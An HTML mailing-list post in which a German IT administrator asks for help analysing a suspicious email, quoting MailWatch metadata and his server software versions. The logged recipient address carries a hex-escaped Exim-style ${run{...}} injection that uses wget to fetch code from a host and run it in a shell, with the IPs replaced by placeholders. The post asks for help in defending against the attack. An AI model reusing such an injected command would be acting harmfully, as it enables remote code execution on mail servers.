<html>

  <head>

    <meta http-equiv="content-type" content="text/html; charset=UTF-8">

  </head>

  <body text="#000000" bgcolor="#FFFFFF">

    Hallo List,<br>

    <br>

    i need some help analysing the following email, i received last

    week.<br>

    <br>

    Mailwatch Mail-Metadata:<br>

    <br>

    Received: from sab.com (unknown [46.22.132.94])<br>

         by mailscanner.mydomain.local (Postfix) with SMTP id

    D3F551005AD<br>

         for <root+${run{x2fbinx2fsht-ctx22wgetx20<b>1.2.3.4</b>x2fsbzx2f<b>5.6.7.8</b><a class="moz-txt-link-abbreviated" href="mailto:x22}}@mailscanner.mydomain.local">x22}}@mailscanner.mydomain.local</a>>;

    Thu, 11 Jul 2019 19:34:58 +0200 (CEST)<br>

    Received: 1<br>

    Received: 2<br>

    Received: 3<br>

    Received: 4<br>

    Received: 5<br>

    Received: 6<br>

    Received: 7<br>

    Received: 8<br>

    Received: 9<br>

    Received: 10<br>

    Received: 11<br>

    Received: 12<br>

    Received: 13<br>

    Received: 14<br>

    Received: 15<br>

    Received: 16<br>

    Received: 17<br>

    Received: 18<br>

    Received: 19<br>

    Received: 20<br>

    Received: 21<br>

    Received: 22<br>

    Received: 23<br>

    Received: 24<br>

    Received: 25<br>

    Received: 26<br>

    Received: 27<br>

    Received: 28<br>

    Received: 29<br>

    Received: 30<br>

    Received: 31<br>

    <br>

    <br>

    <br>

    IP1: <b>199.204.214.40</b> changed to <b>1.2.3.4</b> to disarm

    this...just in case...<br>

    IP2: <b>87.138.227.107</b> changed to <b>5.6.7.8</b> to disarm

    this...just in case...<br>

    <br>

    Versions:<br>

    MailWatch Version: 1.2.9<br>

    OS: Ubuntu 16.04.6 LTS (Xenial Xerus)<br>

    Postfix Version: 3.1.0

    <br>

    MailScanner Version: 5.1.2<br>

    ClamAV Version: 0.102.0-devel-20190715

    <br>

    SpamAssassin Version: 3.4.2

    <br>

    PHP Version: 5.6.40-8+ubuntu16.04.1+deb.sury.org+1<br>

    MySQL Version: 5.7.26-0ubuntu0.16.04.1<br>

    <br>

    Can you help me to bring some light in this dark...<br>

    <pre class="moz-signature" cols="72">-- 

Mit freundlichen Gruessen

H. Backhaus 

Fink-Computer Systeme

Heggrabenstr. 9, 35435 Wettenberg

Email: <a class="moz-txt-link-abbreviated" href="mailto:heino.backhaus@fink-computer.de">heino.backhaus@fink-computer.de</a>

Web: <a class="moz-txt-link-abbreviated" href="http://www.fink-computer.de">www.fink-computer.de</a>

Fax: +49-641-98444638

Fon: +49-641-98444640

UST-ID: DE151040770

HRB: 2143 Gießen

GF: Fredi Fink

I was gratified to be able to answer promptly, and I did.

I said I didn't know.

 Mark Twain

</pre>

  <br />--

<br />Diese E-Mail wurde auf Viren und gefährliche Anhänge

<br />durch

<a href="http://www.mailscanner.info/"><b>MailScanner</b></a> untersucht und ist wahrscheinlich virenfrei.

</body>

</html>